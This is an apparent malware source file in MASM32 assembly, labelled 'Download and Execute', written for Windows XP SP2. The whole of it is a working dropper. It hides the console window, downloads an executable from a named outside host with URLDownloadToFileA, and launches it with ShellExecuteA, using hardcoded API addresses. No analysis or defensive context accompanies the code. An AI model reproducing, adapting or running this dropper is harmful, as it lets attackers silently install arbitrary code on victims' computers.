; Download and Execute by xZR !Sub_Level
; http://sincontrol.tomahost.org
; masm32
; WinXP ES SP2

.386
.MODEL FLAT, STDCALL

include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib



.DATA

  Consola db "ConsoleWindowClass",0
  Direccion db "http://sincontrol.tomahost.org/lilak.exe",0
  Descarga db "lilak.exe",0
  Orden db "open",0
  UrlMon db "urlmon.dll",0
  Shell db "shell32.dll",0
  User db "user32.dll",0
  Kernel db "kernel32.dll",0


.CODE

  Inicio:

          xor eax, eax
          push offset User
          call LoadLibrary

          xor ecx, ecx
          push ecx
          push offset Consola
          mov ebx, 7e3ade87h ; FindWindowA
          call ebx

          xor ecx, ecx
          push ecx
          push eax
          mov ebx, 7e39d8a4h ; ShowWindow
          call ebx
          

          xor eax, eax
          push offset UrlMon
          call LoadLibrary

          xor ecx, ecx
          push ecx
          push ecx
          push offset Descarga
          push offset Direccion
          push ecx
          mov ebx, 7df7b16fh  ; URLDownloadToFileA
          call ebx

          push offset Shell
          call LoadLibrary
          
          xor ecx, ecx
          push ecx
          push ecx
          push ecx
          push offset Descarga
          push offset Orden
          push ecx
          mov ebx,  7ca50ec0h ; ShellExecuteA
          call ebx

          xor eax, eax
          push offset Kernel
          call LoadLibrary
          
          xor ecx, ecx
          push ecx
          mov ebx, 7c81cddah ; ExitProcess
          call ebx
          ret

end Inicio